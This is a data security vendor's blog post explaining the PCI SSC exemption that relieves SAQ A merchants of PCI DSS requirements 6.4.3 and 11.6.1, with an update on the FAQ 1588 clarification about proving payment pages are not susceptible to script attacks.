We are a Data Security Platform (DSP) that allows organizations to discover, classify, and protect their most sensitive data and documents.
© 2025 DataStealth Inc. All Rights Reserved.
The PCI Security Standards Council (PCI SSC) has introduced a major change for merchants completing Self-Assessment Questionnaire (SAQ) A.
Under specific conditions, SAQ-A merchants may now be exempt from meeting PCI DSS requirements 6.4.3 and 11.6.1.
Here's what this means and why it matters.
In the lead-up to this announcement, there were rumors that the PCI SSC might delay the enforcement deadline for requirements 6.4.3 and 11.6.1, originally set for March 31st, 2025.
However, rather than announcing an extended deadline, the Council has instead introduced an exemption for SAQ A merchants—provided certain conditions are met.
SAQ A merchants are not subject to requirements 6.4.3 and 11.6.1 if the “merchant has confirmed that their site is not susceptible to attacks from scripts that could affect the merchant’s e-commerce system(s).”
You can find additional details in the PCI’s blog post here.
Update: On February 28th, 2025, the PCI SSC released FAQ 1588 clarifying how SAQ A merchants using embedded payment forms or iframes from their TPSPs could prove their payment pages are “not susceptible” to script-based attacks. In FAQ 1588, the PCI SSC states that to prove this requirement, the merchant would essentially need to implement the controls in requirements 6.4.3 and 11.6.1 or get a confirmation from their TPSP/payment processor.
Learn more about this change in our latest blog here.
The exemption applies to two key requirements:
Previously, all merchants—regardless of their SAQ type—were expected to comply with these requirements. Moving forward, SAQ A merchants are no longer subject to these requirements.
SAQ A merchants outsource all payment processing and cardholder data (CHD) management to TPSPs, meaning they don’t directly handle sensitive card data themselves. As a result, the compliance burden shifts to the TPSP.
To clarify: requirements 6.4.3 and 11.6.1 are not being removed from PCI DSS—they simply won’t apply to SAQ A merchants under these new conditions.
This change could significantly benefit e-commerce businesses that rely entirely on TPSPs for payment processing and CHD management. It would result in a reduced compliance burden as eligible merchants can avoid implementing complex script management and monitoring controls themselves, saving time and resources.
Additionally, larger merchants may explore whether they can leverage similar exemptions by reducing their PCI DSS scope through TPSPs.